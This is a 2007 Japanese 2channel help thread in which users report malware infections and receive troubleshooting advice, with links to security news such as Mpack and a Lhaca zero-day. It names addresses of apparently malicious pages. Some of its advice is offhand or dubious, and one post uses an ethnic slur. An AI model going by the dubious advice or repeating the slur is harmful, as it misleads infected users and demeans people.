さらに、iframeで指定されたアドレスに飛んでみると、スクリプトの記述があるね。

しかし、あのvistaでMicrosoftUpdate最新で、対策ソフトも有って、ルータも有る。
それで、サイト閲覧だけでこうなるなんて考えられないな。
もしかして…サイト見ている時、
『実行するにはあなたの許可が必要です』っていう窓が出てきて、それに対して「YES」を押したとか?
…直前で気づくよな、それだと

273 名前:271 [2007/06/13(水) 01:01:17 ]
>272
早速のお返事ありがとうございます。
そして書き方が悪くてすいません。
81.95.149.28/logo/index.phpは、ウィルスバスターの警告ウィンドウに表示されていたアドレスで、
自サイトのアドレスではないんですが…、というのが伝わっていてのご回答だったらすいません…。
ちなみに『実行するには〜』という窓は、記憶する限り出てきていないです。

274 名前: ◆N9P3SuvBPo mailto:sage [2007/06/13(水) 01:07:51 ]
>273
>自サイトのアドレスではないんですが…
あれ?
>271では
>【どんな症状が出るか】 「自分のHPを見ると、『警告 危険なWebサイトです』というスパイウェアの警告が表示されます。
>アドレスは『81.95.149.28/logo/index.php』です。
って書いてあるんだけど…

>ちなみに『実行するには〜』という窓は、記憶する限り出てきていないです。
UAC=ユーザーアカウント制御の画面が出てないのに、マルウェアにやられた?

275 名前: ◆N9P3SuvBPo mailto:sage [2007/06/13(水) 01:22:59 ]
仕方ない…誘導する
ttp://www.higaitaisaku.com/
↑の「PCトラブル質問掲示板」で質問

276 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/13(水) 01:25:17 ]
suzukiairi.net/cgi-bin/up/img/puniairi150.jpg

これ押しちゃったんですがやばいですか?
なんか字がいっぱい書いてあるメモ帳みたいなのが表示されて
今のトコなんもないんですけど・・・

277 名前:271 mailto:sage [2007/06/13(水) 01:35:30 ]
>275
バスターの警告ウィンドウに「アドレス」という項目があって、
そのつもりで書いてました…。文章悪くてすいません…。
質問掲示板、行ってみます!ありがとうございました!

278 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/13(水) 01:45:19 ]
>>276
PHP入れてないだろ? なら無問題

279 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/13(水) 08:04:36 ]
>>277
>>255-256

280 名前:277 mailto:sage [2007/06/13(水) 15:44:08 ]
>279
そちらも参照して、iframeの削除とキャッシュのクリアはやってみました。
また、HPでphpは使っていません。が、やはりHPの改竄がされてしまっているようです…。
サーバーは、2つ使っていて2つとも改竄されてしまっているので、
サーバーではなく、やはりこちらのパソコンの問題だと思うのですが、ウィルスも検出されません。

ちなみに、改竄された自サイトにアクセスした時に警告が出て、その時に隔離されたウィルスのログは
"ウイルスログ","2007/06/13","B-PC"
"時刻","検索の種類","種類","ウイルス名",
"ファイル名","ウイルス検出時の処理","駆除できない場合の処理"
"12:03","リアルタイム検索","ファイル","JS_PSYME.AGB",
"C:\Users\b\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\2XV27BGG\index_mp[1].htm","隔離 済み(安全です)",""
です。
私も同じく、ネットにつながらなくなったり重くなったりしています。



281 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/13(水) 17:09:41 ]
>>280
だから切り分けろって。
そのPCが何か踏んでいて改竄しているのか、
第三者(海外など)から改竄されているのか。

何か踏んでそのPCからパスワード抜かれた可能性もあるから
サイトのパスワードも別PCで変えて、その上で
そのPCでしばらくアクセスしない(メンテは別PCでする)。
それでも改竄されるなら後者だろ?
あとはサーバ管理者と話せ。

282 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/13(水) 17:26:28 ]
>>280
あとwww.ipa.go.jpにも報告したほうがいいよ
サーバもログインID&パスワードを感染していない安全なPCで変更したほうがいいよ

283 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/13(水) 20:31:43 ]
流れぶったぎってわるいがBITSネタ

BITSを使って侵入してくる悪者たち
itpro.nikkeibp.co.jp/article/COLUMN/20070612/274451/?ST=security

284 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/14(木) 20:24:15 ]
Web 2.0は危険がいっぱい 悪意のJavaScriptで情報が漏えい

itpro.nikkeibp.co.jp/article/COLUMN/20070307/264131/?ST=csirt

285 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/14(木) 21:08:35 ]
BITSが危ないってネタが出てからサービスを無効にしているが、
有名どころでBITS使うのってMSのうpだてとGoogle アップデータぐらいだよな?
他に何かある?

286 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/14(木) 21:39:33 ]
ロシアでは去年技術文書が出ていて
ドイツで4月か5月には実装したMalwareが出回ってる。

287 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/14(木) 23:34:41 ]
AV-Test.org Reports Stats from Antivirus Roundup 検知力テスト結果 (2007年05月22日)
ttp://www.pcmag.com/article2/0,1895,2135053,00.asp

01位)WebWasher  99.83% (605,846)
02位)AVK 2007   99.56% (604,255)
03位)AntiVir     99.42% (603,408)
04位)F-Secure.   97.93% (594,333)
05位)Symantec   97.77% (593,355)
06位)Kaspersky   97.64% (592,606)
07位)Fortinet.    97.06% (589,028)
08位)Avast!.     96.32% (584,574)
09位)AVG.      96.15% (583,541)
10位)Rising      96.02% (582,772)
11位)BitDefender  95.68% (580,700)
12位)Norman..    94.66% (574,476)
13位)Ikarus..     92.54% (561,607)
14位)Panda.     92.09% (558,899)
15位)Trend Micro 90.97% (552,107)
16位)Nod32.     88.32% (536,043)
17位)McAfee     87.28% (529,680)

288 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/15(金) 20:08:02 ]
>261
亀ですみません、ありがとうございました。

spypodを半月ぶりにしてみたら「DNSChanger」という何か名前的にすごく嫌な
感じのファイルが検出されて…。ググるとトロイの木馬ということみたいなのですが
「コンピュータがハッカーに遠隔操作され、ポートが勝手に開かれてしまう...危険度70%」等と
あったのですが、このポートというものが開かれているって、自分のパソコンのどこを
見れば分かりますか…?
最近ネットに繋がったり繋がらなかったりするのもこれのせいなのかなって…

289 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/15(金) 21:02:41 ]
手遅れだな。チーン

290 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/15(金) 21:56:16 ]
ボット対策を議論「もはや感染予防ソリューションでは対応不可能」
internet.watch.impress.co.jp/cda/event/2007/06/14/16051.html



291 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/15(金) 23:09:00 ]
どんな纏めだよw

292 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/16(土) 20:14:36 ]
Googleがユーザーをウイルス扱い? Kaspersky Labが問題提起
www.itmedia.co.jp/news/articles/0706/16/news011.html

293 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/16(土) 23:49:13 ]
Kaspersky Labの顧客=スパマー


294 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/17(日) 00:06:03 ]
↑NOD厨乙。

295 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/17(日) 00:19:45 ]
>>292
NOD信者がウイルス扱いされるって話だったら、物凄く納得できるけどな。
つーか実際ウイルスだし。



296 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/17(日) 01:05:54 ]
>>295
ウイルスに失礼だろw

297 名前:初心者 [2007/06/17(日) 01:59:39 ]
どなたか詳しい方教えて下さい。

アンチウィルスソフトはどこがいいですか?

以前マイクロトレンドのウィルスバスターを使っていたのですが、
立ち上がりの遅さとこの会社の管理体制の甘さがいやになって、
ソースネクストのウィルスセキュリティに変えました。

ウィルスセキュリティは立ち上がりが早く、廉価で気に入っているのですが、
2ちゃんの書き込みを見ていると、どうやら他のソフトよりも劣るみたいです。
(他社のソフトでウィルス反応が出ても、ウィルスセキュリティでは出なかったりとか…)

どうか先輩方、よろしくお願いします。

298 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/17(日) 02:03:55 ]
>>297
体験版で試せとしか言えん
「これ」と指定するとアンチが沸く

299 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/17(日) 08:33:40 ]
>立ち上がりの遅さとこの会社の管理体制の甘さがいやになって、
>ソースネクストのウィルスセキュリティに変えました。

  おまえ、漫才師になれるぞ。

300 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/17(日) 09:17:26 ]
ウイルスセキュリティZEROはその名のとおりセキュリティがゼロだっていうのにね…

ノーガード戦法万歳!ですよ。



301 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/18(月) 16:11:38 ]
>281>282
別パソコンからパスワード変えて収まりました。
ありがとうございました!

302 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/18(月) 21:25:17 ]
Webベースの「スーパー・ワーム」がまもなく登場か?
itpro.nikkeibp.co.jp/article/COLUMN/20070615/274892/?ST=security

“見えない”攻撃に挑む
itpro.nikkeibp.co.jp/article/COLUMN/20070606/273809/?ST=security

303 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/19(火) 19:58:59 ]
大規模なウェブ攻撃「Mpack」が猛威--セキュリティ企業が注意を呼びかけ
japan.cnet.com/news/sec/story/0,2000056024,20351098,00.htm

「Mpack」と名づけられた今回の攻撃は、クロスサイトスクリプティングを用いて合法的なウェブサイトに悪質なiFrameを配置する

Trend Microは、このような攻撃を防ぐために、ソフトウェアのインストールを求めるサイトに注意するように呼びかけている。
信頼できるサイトかソフトウェア配信元でなければ、ソフトウェアのインストールを許可してはならない。
パソコン上のソフトウェアにはすべてパッチを適用し、ウイルス対策ソフトウェアを更新すること。

304 名前:297 [2007/06/19(火) 22:22:12 ]
>>298
ご助言、ありがとうございます。
フリーのスキャンを色々試しています。
そしたら、出るわ出るわ・・・。PANDAではかなり出ました。
ウィルスセキュリティでは無反応なのに。
2chとかアングラにアクセスするのはウィルスセキュリティでは危険すぎますね。

>>299お褒めのお言葉、ありがとうございます。

305 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/19(火) 22:42:07 ]
あるネトゲを起動したら、こんなの検出したんですが・・・
ラグナロクもwinyyもやってないのになぁ
ウィルスバスターで全体検査しとけばいいのかな?
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FKAKKEYS%2EB

306 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/19(火) 23:18:53 ]
あるネトゲってなんだよ。
まずは運営に通報しろよ

307 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/20(水) 00:41:53 ]
【使用OS】 Windows xp
【使用セキュリティソフトとバージョン】 K7 Computing?の製品だと思いますが、名前がわかりません。
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 されていないと思います。
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
magistrとMS05-002と表示されました。削除できたかどうか不明です。
【どんな症状が出るか】 C:\Windows\System32\lsass.exeは状態コード259で突然終了しました
と表示され再起動を繰り返します。

テンプレにあった再起動を止める方法を試しているのですが、ようこその画面が出てすぐにカウントが
始まるため、停止出来ません。セーフモードではうごきますが、USBメモリで移したマイクロソフトの駆除ツールも動いてくれません。
友人からの頼まれなのですが、当方知識が浅いため困っております。
どなたか対処の方法をご鞭撻宜しくお願い致します。














308 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/20(水) 08:15:13 ]
頼まれて出来ないなら、リカバリすれ。
データは諦めてな。

309 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/20(水) 08:39:35 ]
>>307
これじゃね?
ttp://www.microsoft.com/japan/technet/security/alerts/sasser.mspx

310 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/20(水) 09:04:26 ]
>>307
XPをSP2にしていないのか? WindowsUpdateしていないのか?
K7ってことはソースネクストだが、こんなもんすら阻止できないのか?



311 名前:名無しさん@お腹いっぱい。 [2007/06/20(水) 09:26:25 ]
カスペ先生がポルノウェア not-a-virus:Porn-Dialer.Win32.Agent.aw
を7つも発見しました。テプコ光IP電話を使っているのですが、
この場合電話は大丈夫でしょうか?モデムタイプのウェアなのでしょうか?

312 名前:305 mailto:sage [2007/06/20(水) 19:08:02 ]
プレイしてたネトゲはファンタジーアースです。
あの後、全体検査も検出0で済み
安心していつも通りPC使用。
先ほどネット閲覧してたら急に処理が重くなり
上記と同じウィルスをバスターが再度検出。
その後、デスクトップに壁紙以外
何も映ってない状態になりました。
こうなっては、タスクマネージャーの開き方くらいしか分からないため
取りあえず開いてみると
中にCPU99使用してるプロセスが。
名称 System Idle Proce...
プロセス終了も受け付けてくれず、途方に暮れてます。
対処方何かないでしょうか・・・

313 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/20(水) 20:16:31 ]
>>312
System Idle ProcessはCPUの空き時間を表示してる。

セーフモードで起動して、>>305のサイトの「対応方法」の通りにすればいい。

314 名前:名無しさん@お腹いっぱい。 [2007/06/21(木) 00:51:44 ]
質問です。

フリーでオススメのウイルス対策ソフトは、ありますか?
スレ違いでしたら、誘導お願いします。

315 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/21(木) 01:14:12 ]
>>314
【無料】 フリーセキュリティ の組合せ 3
pc11.2ch.net/test/read.cgi/sec/1176377557/

フリーのアンチウイルスソフト Part11
pc11.2ch.net/test/read.cgi/sec/1176468922/

316 名前:名無しさん@お腹いっぱい。 [2007/06/21(木) 12:52:59 ]
ウィルスに感染して困ってんだったら、ここに行って相談

ttp://www.symantec.com/ja/jp/home_homeoffice/support/premium_virus.jsp

317 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/21(木) 13:32:38 ]
>>248
新種ウイルスの検知結果が追加
http://www5.uploader.jp/user/tane/images/tane_uljp00049.png

Microsoftアンチウイルス検知名:Wrom:Win32./nuwar.gen
Kaspersky検知名:Trojan-Downloader.Win32.Tibs.lf

アンラボV3やNOD32などは、まだ検知できていないので、
それらのユーザーさんはご注意して下さい。

318 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/22(金) 02:03:34 ]
【使用OS】 「XP」  
【使用セキュリティソフトとバージョン】 「avast!」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「しています」 
【ルータの有無】 「なし」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「なし」

【どんな症状が出るか】 「10分ぐらいの間隔で画面上に赤丸で埋め尽くされる、再起動するとタスクマネージャが使用不可になってたりインターネットのホームが固定される」
【症状が出る前に何をやったか】 「winny」
【症状を解決しようとどのような処置を取ったか】 「各種ウィルススキャンなど


319 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/22(金) 05:59:14 ]
>>318
>>13

320 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/22(金) 10:17:45 ]
前から疑問だったんだが、このスレでは
『ノートンはスルーしてるけど、スパイボットは反応する』
という事案も対応してるの?

スパイウェアはスパイウェアで専用スレが有るのか?



321 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/22(金) 12:26:38 ]
日本語で

322 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/22(金) 13:26:22 ]
餅は餅屋

323 名前:名無しさん@お腹いっぱい。 [2007/06/22(金) 14:42:15 ]
他人の携帯を覗き見するウィルスってあります?

324 名前:名無しさん@お腹いっぱい。 [2007/06/22(金) 15:44:58 ]
スゲー重いんですけど、この重さ異常

325 名前:名無しさん@お腹いっぱい。 [2007/06/22(金) 15:50:12 ]
NOD厨が2CHで変なスクリプト埋め込んでるらしい

326 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/22(金) 16:59:18 ]
なんかロシア発関連が多い
米在モスクワ大使館
ロシア政府がサイバー攻撃してる悪寒。


327 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/22(金) 17:01:57 ]
>>323

答えはNOだ。

しかしWindows Mobile
ノキアなどなら可能になるかもしれない。
通常のケータイでは不可



328 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/22(金) 17:12:56 ]
>>326
確かに今ロシア激ヤバだが、最近2CHにも変な外人が出入りしてるよな

329 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/22(金) 20:20:40 ]
ウェブアプリの脆弱性も感染手段--JPCERT/CC、ボットの実態を調査
japan.cnet.com/news/sec/story/0,2000056024,20351361,00.htm

調査資料
www.jpcert.or.jp/research/2007/recent_malware_trend.pdf

330 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/22(金) 20:46:28 ]
変な外人?
チョン共がザパニーズでもしたのかな




331 名前:名無しさん@お腹いっぱい。 [2007/06/23(土) 23:45:41 ]
【使用OS】 「XP」  
【使用セキュリティソフトとバージョン】 「Norton2002」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「再インスコ後に更新」 
【ルータの有無】 「あり」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「なし」

【どんな症状が出るか】 「映像ファイルをメディアプレイヤー(WMPに限
らず)で再生すると、その再生と一緒に知らない音楽が鳴ってしまう。

【症状が出る前に何をやったか】 「不明」
【症状を解決しようとどのような処置を取ったか】 「システムの復元→
Cドライブを再インスコに→全ドライブのウィルスチェック」

332 名前:331 mailto:sage [2007/06/23(土) 23:49:04 ]
↑よろしくお願いします。

333 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/23(土) 23:52:31 ]
映像ファイルとやらに聞いてみ

334 名前:名無しさん@お腹いっぱい。 [2007/06/23(土) 23:52:43 ]
【使用OS】 「win XP home」
【Microsoft Update(MU)の状態】 「わかりません・・」 
【使用セキュリティソフトとバージョン】 「K7 Computingの物」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「3月くらいのものです」 
【ルータの有無】 「有り coregaルーター」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「名前はわかりません・・;;警告が出た直後に再起動してしまいました;;」

【どんな症状が出るか】 「ようこそ画面にドクロが表示され、Alt+F4でのみログイン可能です。デスクトップにいった後は、
一部のアプリケーションが起動しません。K7(略)のセキュルティソフトも起動しません;;」
【症状が出る前に何をやったか】 「オンラインゲーム等しか心当たりは;;」
【症状を解決しようとどのような処置を取ったか】 「いろいろ検索したりしましたが、言葉や説明が難しく得意でない私にはわかりません・・」
【その他の質問】 「削除方法はないのでしょうか?」


335 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/23(土) 23:57:12 ]
リカバリっすね

336 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/23(土) 23:57:24 ]
>>334
起動するならオンラインスキャンで

337 名前:名無しさん@お腹いっぱい。 [2007/06/23(土) 23:59:16 ]
>>334

気づきませんでした;;今からやってみます。


338 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/24(日) 00:02:31 ]
髑髏か・・・リカバリ推奨やな

339 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/24(日) 03:08:42 ]
【症状が出る前に何をやったか】 「オンラインゲーム等しか心当たりは;;」

↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑
P2P厨P2P厨P2P厨P2P厨P2P厨P2P厨P2P厨P2P厨P2P厨P2P厨P2P厨P2P厨
発見発見発見発見発見発見発見発見発見発見発見発見発見発見発見発見
Winny使用者Winny使用者Winny使用者Winny使用者Winny使用者Winny使用者
感染かわいそう感染かわいそう感染かわいそう感染かわいそう感染かわいそう
ね〜ね〜ね〜ね〜ね〜ね〜ね〜ね〜ね〜ね〜ね〜ね〜ね〜ね〜ね〜ね〜

340 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/25(月) 02:38:39 ]
>>334
ttp://blog.livedoor.jp/hpg/archives/50125241.html



341 名前:名無しさん@お腹いっぱい。 [2007/06/26(火) 20:14:08 ]
あの「Lhaca」がアブない、日本標的のゼロデイウイルス発見
itpro.nikkeibp.co.jp/article/NEWS/20070626/275891/

米シマンテックは2007年6月25日(米国時間)、ファイル圧縮・解凍ソフト「Lhaca(ラカ)」のぜい弱性を悪用するウイルス(悪質なプログラム)が確認されたとして注意を呼びかけた。
LZH形式(.lzh)のウイルスをLhacaで読み込むと、パソコンを乗っ取られる恐れがある。
今回のウイルスが悪用するぜい弱性に対する修正プログラムなどは公表されていないので、「ゼロデイウイルス」といえる。

今回のウイルスは、日本のユーザーから6月22日に同社に送られたという。同社が解析したところ、何らかのぜい弱性を突くものであることが明らかとなった。
その後の調査で、日本国内で広く使われているLhacaに、修正プログラムが未公開のぜい弱性があることが判明。今回のウイルスはそのぜい弱性を悪用するものだと分かった。
同社の情報によれば、少なくてもLhaca(デラックス版)1.20に、今回のぜい弱性が存在するという。

同社が検証したところ、日本語版Windows XP上のLhaca 1.20において、ウイルスは動作したという。
LZH形式ファイルであるウイルスをLhacaで読み込むと、ウイルスは別のウイルスを生成して実行する。
生成されたウイルスは「バックドア」と呼ばれる種類のウイルスで、攻撃者(ウイルス作者)が遠隔からそのパソコンを操作できるようにする。
つまり、攻撃者にパソコンを乗っ取られる恐れがある。

LZH形式やLhacaおよび一太郎は、主に日本国内で利用されているので、今回のウイルスは日本のユーザーを標的にしている可能性が高いという。

Symantec Security Response Weblog
Beware of LZH
www.symantec.com/enterprise/security_response/weblog/2007/06/beware_of_lzh.html

342 名前:名無しさん@お腹いっぱい。 [2007/06/27(水) 17:25:05 ]
★質問用テンプレ★
【使用OS】 「」
【Microsoft Update(MU)の状態】 「」 
【使用セキュリティソフトとバージョン】 「ソースネクストウィルスセキュリティ」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「YES」 
【スパイウェア対策ソフト】 「Adaware現状最新版」 
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「YES」
【ルータの有無】 「有」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「c:\windows\system32\cbxvw.dll がみつかり、Adware.Win32.Virtumonde.fp と認識するが駆除できず」

【どんな症状が出るか】 「winlogonプロセスが50%ほどCPUをつかう」
【症状が出る前に何をやったか】 「特に覚えがない が、前日まで正常に起動し 次の朝起動したら症状発生」
【症状を解決しようとどのような処置を取ったか】 「セーフモード起動でウィルススキャンとアドウェアスキャンを実行 
また、直接ファイルを削除しようとしても削除できず→別のプロセスが使用している様子」
【その他の質問】 「起動時に必ずウィルスセキュリティが隔離するものの削除ができないんで困っています。」

343 名前:342 [2007/06/27(水) 17:26:24 ]
入力忘れです。

【使用OS】 「XP PRO SP2」
【Microsoft Update(MU)の状態】 「必要ないものもとにかくすべて入れてあります」 

344 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/27(水) 18:01:23 ]
> 【使用セキュリティソフトとバージョン】 「ソースネクストウィルスセキュリティ」

また釣りか・・・

345 名前: ◆N9P3SuvBPo mailto:sage [2007/06/27(水) 18:30:53 ]
>343
具体的には、何らかのソフトのページに飛ばされると言ったとこかな?

つ「VundoFix」

346 名前:名無しさん@お腹いっぱい。 [2007/06/27(水) 19:47:52 ]
>>345

情報ありがとうございます

具体的にはおっしゃるとおりです。
あと、WinDoctorのページが勝手にIEでたちあがったりもしますね・・・・orz

ちょっと検索してきます。


347 名前:名無しさん@お腹いっぱい。 [2007/06/27(水) 20:39:16 ]
>>345
無事解決できました!!
Googleでウィルス名で調べても無理だったのでカナリあきらめていたんですが・・・
すっごい助かりました!!!
感謝です

348 名前: ◆N9P3SuvBPo mailto:sage [2007/06/27(水) 21:54:50 ]
>347
早っw

念の為、カスペのオンラインスキャンでもやっとけ。

349 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/27(水) 23:46:03 ]
【使用OS】 XP
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 ウイルスバスター2006 最新
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 最新 
【スパイウェア対策ソフト】 なし
【ルータの有無】 有

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
スキャンしても何も出ず

【どんな症状が出るか】 起動して数分経ったら画面が切り替わるような動作をして
                音声が出なくなり、ウィンドウの上の部分が勝手にクラシックタイプ
                な感じになり、何かをインストールするとフリーズしてしまいます

【症状が出る前に何をやったか】 何やらexeを踏んだ気が


350 名前: ◆N9P3SuvBPo mailto:sage [2007/06/28(木) 00:00:45 ]
>349
そのパソコンをセーフモードで起動して
システムの復元で問題発生前の日付を選んで復元
…失敗に終わったらリカバリしろ



351 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/28(木) 00:12:07 ]
>>350
システム復元やってみます
・・・因みに今さっきまでシステム復元を無効にしてたのですが
もう詰み、オワタ状態じゃないですよね?

352 名前: ◆N9P3SuvBPo mailto:sage [2007/06/28(木) 00:24:28 ]
>351
今の状態で復元ポイント確認しろ
ポイントがグレーアウトしてたら、絶望だ。

353 名前:吟遊詩人 [2007/06/28(木) 10:31:36 ]
>>349
リカバリー自体は、ウィンドウズの修復目的であってウィルス本体は
そのままHDDに残ります。
フルフォーマットしてインストールが確実だと思われ。


354 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/28(木) 12:13:11 ]
>リカバリー自体は、ウィンドウズの修復目的であって

誰が決めた ?

355 名前:349 mailto:sage [2007/06/28(木) 13:42:24 ]
システム復元ができずリカバリすることにしました
俺滅茶苦茶涙目wwwwwwwwwwwww・・・・

356 名前:吟遊詩人 [2007/06/28(木) 14:25:43 ]
リカバリ厨現れましたねw
PC初心者ですか?


357 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/28(木) 14:35:30 ]
>>355
しかし一番確実で更に安定するな

358 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/28(木) 14:51:40 ]
【使用OS】 XPSP2
【Microsoft Update(MU)の状態】 AUTO 
【使用セキュリティソフトとバージョン】 ウィルスバスター2007
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 常に最新 
【スパイウェア対策ソフト】 ウィルスバスター2007
【スパイウェア対策ソフトの更新は定期的に行なっているか】 常に最新
【ルータの有無】 バッファローの無線ルータ

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「」

【どんな症状が出るか】 映像ファイルが全てJPGに変わり、焼きそばならたらって絵が表示された。
               再生は勿論できない。プレイヤープログラムも起動不可
【症状が出る前に何をやったか】 見たことのないaviファイルを再生した。
【症状を解決しようとどのような処置を取ったか】 ウィルスバスターでスキャンしたが異常なし。
                               ノートンではひっかかった。
【その他の質問】 もうリカバリしたのでいいんですが、このウィルスってなんですか?


359 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/28(木) 14:54:55 ]
>>353
ハードディスクの乗せ代えが安全確実だが一般的でない

360 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/28(木) 15:07:13 ]
>>358
「P2Pなんてやめて、焼きそば食べろ」

Antinnyじゃないか?、「.scr」を踏んだな。



361 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/28(木) 17:25:12 ]
ちょっと前にこの板で出てきた ちょっと待ってろオタ野郎 とか出る奴の亜種なんじゃね?

362 名前:名無しさん@お腹いっぱい。 [2007/06/28(木) 21:42:59 ]
>>357
しかし、めんどくさい。

363 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/28(木) 23:19:19 ]
>>362
リカバリディスク自作しておくと数十分で終わる

364 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/28(木) 23:49:43 ]
>>358
原田。>>13

365 名前:349 mailto:sage [2007/06/29(金) 00:37:57 ]
OSを上書きしてみたら直りましたので報告しときます

366 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/06/29(金) 00:52:43 ]
>上書きしてみたら直りました
>上書きしてみたら直りました
>上書きしてみたら直りました
>上書きしてみたら直りました

367 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/01(日) 15:07:53 ]
[ビ+]【PCソフト】修正したばかりの+Lhacaにまた脆弱性、新たな修正版(Ver.1.23)をリリース [07/01]
headline.2ch.net/test/read.cgi/bbynews/1183269852/

368 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/01(日) 15:20:23 ]
【使用OS】 「Windows xp」
【Microsoft Update(MU)の状態】 「」 
【使用セキュリティソフトとバージョン】 「NOD32、2.7」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」 
【スパイウェア対策ソフト】 「Lavasoft Ad-Aware SE Personal」 
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「いる」
【ルータの有無】 「有」

インターネットエクスプローラーを開くたびにWin32/Adware.Alexaアプリケーション(と亜種)のウイルスが検出されます
operaの方は何も出ませんが

369 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/01(日) 15:23:50 ]
定番

370 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/01(日) 15:52:13 ]
Alexaで検索してファイルを消したら治りました



371 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/01(日) 16:53:27 ]
先日ウィルスに感染しました。
トレンドフレックスセキュリティ ttp://www.trendflexsecurity.jp/
の無料オンラインスキャンにかけたところ、400ぐらいのウィルス判定が出て
一応ほとんどは駆除できたのですが、
TROJ_SMALL.EVH
TROJ_SMALL.HCA
TROJ_PAKES.EK
の3つだけ駆除も削除もできないウィルスが残ってしまいました。
調べても詳しい情報が出ていないのでとりあえず放置なんですが

で、感染したファイルの大半は既存の(HDD内にあった)実行可能な.exeファイルに次々と寄生していくという挙動だったんですが、
たまたま事前にファイル群のバックアップをとってあったので、
このバックアップのexeと駆除した後のexeを比較したところ、
後者は更新日時は変わってしまいましたが、
ファイルサイズ,ハッシュはどれも一致しておりました。
ウィルス駆除ソフトでここまで適切にウィルス部分だけを取り除くことができるもんなんですかね?


372 名前:名無しさん@お腹いっぱい。 [2007/07/01(日) 18:31:49 ]
ttp://www.jpcert.or.jp/at/2007/at070016.txt
ゼロディが出たら、怖いな…



373 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/01(日) 19:22:49 ]
